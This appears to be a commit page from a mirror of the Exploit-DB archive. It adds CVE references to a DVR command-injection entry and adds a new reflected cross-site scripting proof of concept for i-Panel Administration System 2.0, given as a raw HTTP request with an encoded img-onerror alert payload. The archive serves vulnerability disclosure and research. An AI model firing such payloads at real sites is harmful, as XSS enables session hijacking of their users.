bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2021-10-16

Browse source 
2 changes to exploits/shellcodes

i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
This commit is contained in:
Offensive Security 2021-10-16 05:02:08 +00:00
parent 3e8f9f4d30
commit a7f5a62613
3 changed files with 23 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

2
exploits/multiple/webapps/50098.txt
View file

@ -4,6 +4,8 @@
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.
# CVE: CVE-2021-42071
# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/
# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.

20
exploits/php/webapps/50418.txt Normal file
View file

@ -0,0 +1,20 @@
# Exploit Title: i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)
# Date: 04.10.2021
# Exploit Author: Forster Chiu
# Vendor Homepage: https://www.hkurl.com
# Version: 2.0
# Tested on: Chrome, Edge and Firefox
# CVE: CVE-2021-41878
# Reference: https://cybergroot.com/cve_submission/2021-1/XSS_i-Panel_2.0.html
As a proof of concept, an alert box can be generated with the following payload.
Exploit PoC:
GET /lostpassword.php/n4gap%22%3E%3Cimg%20src=a%20onerror=alert(%22XSSVulnerable%22)%3E HTTP/1.1
Host: Forster
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Cookie: PHPSESSID=7db442d0ed0f9c8e21f5151c3711973e
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept-Language: en-gb
Accept-Encoding: gzip, deflate
Connection: close

1
files_exploits.csv
View file

@ -44364,3 +44364,4 @@ id,file,description,date,author,type,platform,port
50412,exploits/php/webapps/50412.txt,"Student Quarterly Grading System 1.0 - 'grade' Stored Cross-Site Scripting (XSS)",1970-01-01,"Hüseyin Serkan Balkanli",webapps,php,
50413,exploits/multiple/webapps/50413.txt,"Logitech Media Server 8.2.0 - 'Title' Cross-Site Scripting (XSS)",1970-01-01,"Mert Daş",webapps,multiple,
50414,exploits/hardware/webapps/50414.txt,"Sonicwall SonicOS 7.0 - Host Header Injection",1970-01-01,Ramikan,webapps,hardware,
50418,exploits/php/webapps/50418.txt,"i-Panel Administration System 2.0 - Reflected Cross-site Scripting (XSS)",1970-01-01,"Forster Chiu",webapps,php,

Can't render this file because it is too large.